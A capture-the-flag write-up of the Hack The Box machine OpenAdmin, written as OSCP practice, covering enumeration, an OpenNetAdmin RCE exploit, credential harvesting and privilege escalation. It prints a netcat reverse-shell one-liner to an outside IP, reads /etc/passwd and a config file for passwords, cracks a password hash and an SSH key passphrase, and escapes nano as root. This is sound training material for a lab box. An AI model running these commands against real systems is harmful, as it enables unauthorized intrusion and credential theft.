Hack The Box — OpenAdmin — without Metasploit (TJNull’s list for OSCP)
This is my 20th write-up for OpenAdmin, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually 3 major phases that are involved.
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
Enumeration
In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.
nmap -p- -T4 openadmin.htb --max-retries=0
Let’s run a targeted scan on these 2 open ports.
nmap -sC -sV -T4 -A -p22,80 openadmin.htb
We have Apache 2.4.29 running and OpenSSH 7.6p1. Let’s go to the web server and see what we have there.
Default Apache2 page. Let’s run a gobuster scan, since this tool has become my new favorite.
gobuster dir -u http://openadmin.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error
So we found several directories. Let’s check them one by one.
/music
Just a page with nothing important.
(Note: I wasted a lot of time here enumerating, checking the page source of this page along with other /artwork and /sierra but I am gonna skip all that.)
If we check the login button on this /music page, it leads to /ona directory.
The Title of this page is OpenNetAdmin and it also tells us the version 18.1.1
Initial Foothold
Let’s search for an exploit for this version of OpenNetAdmin. By a quick google search I found this exploit on GitHub.
https://github.com/amriunix/ona-rce
Let’s try this exploit.
This python exploit requires an option (Either: exploit/check) and a URL. Let’s check it first.
python ona-rce.py check http://openadmin.htb/ona
The target appears to be vulnerable. Let’s exploit it.
And we have a shell. Let’s get a reverse shell out of this running exploit.
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.32 4242 >/tmp/f
We got a reverse shell. Let’s upgrade it to python pty.
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Let’s see what users we have on the target.
cat /etc/passwd
We have two more users along with root and that are Jimmy and Joanna.
Let’s see what we have in their home directories.
We can not see the contents of their home directories due to no read permissions.
(Note: Again, I wasted a lot of time enumerating the target machine, running Linpeas and LinEnum, but I will skip all that)
If we look at the web root in /var/www
We have this internal directory that jimmy can read. So, we might need his credentials first.
If we go in /ona directory again,
We have this local directory and inside that local directory, we have a config directory and inside that config directory, we have a file database_settings.inc.php
We have credentials here. Since jimmy seems to be the one administering the services, let’s try SSH and use these credentials for jimmy.
ssh jimmy@openadmin.htb
Adn we are jimmy!
Let’s see what commands Jimmy can run as sudo.
sudo -l
Jimmy can’t run any commands with sudo.
Let’s enumerate the /etc/apache2
Here we have sites-enabled directory.
Let’s check internal.conf
And we can see that a virtual hosting is done by the name internal.opendmin.htb on localhost:52846, and it’s running as user joanna. And the DocumentRoot is set to /var/www/internal to which jimmy had access. (We noticed that earlier)
Let’s see what we have in /var/www/internal
So, let’s try to SSH tunnel this port from our kali machine and see what we have on this web service.
On our kali machine we need to do SSH local port forwarding.
ssh -N -L <kali tun0 ip>:8090:127.0.0.1:52846 jimmy@openadmin.htb
We have forwarded our own port 8090 to the target’s 52846 through SSH tunneling. Now if we visit our own 8090 port from a browser.
We get this login page. That’s probably the index.php in the /var/www/internal. Let’s check that file from our ssh session on the target.
We have this username and password hash here. Let’s crack that hash using crackstation.com
So the username is jimmy and the password is revealed. Let’s login.
We get this RSA encrypted key. Let’s copy it and convert it to john format using ssh2john.
ssh2john encrypted_rsa > john_incrypted_rsaThen
john john_incrypted_rsa -w=/usr/share/wordlists/rockyou.txt --format=SSH
We got the passphrase. Let’s SSH into joanna using this encrypted key and passphrase.
ssh joanna@openadmin.htb -i encrypted_rsa
And we are joanna. Let’s see what command Joanna can run as sudo.
sudo -l
Joanna can run /bin/nano /opt/priv as sudo. And according to GTFOBins we can use the following technique to get a shell out of nano.
Let’s do that.
sudo /bin/nano /opt/privThen CTRL+R, then CTRL+X then reset; sh 1>&0 2>&0
And we are root. Just clear the screen to get a fresh shell. And then /bin/bash to invoke bash session. :)
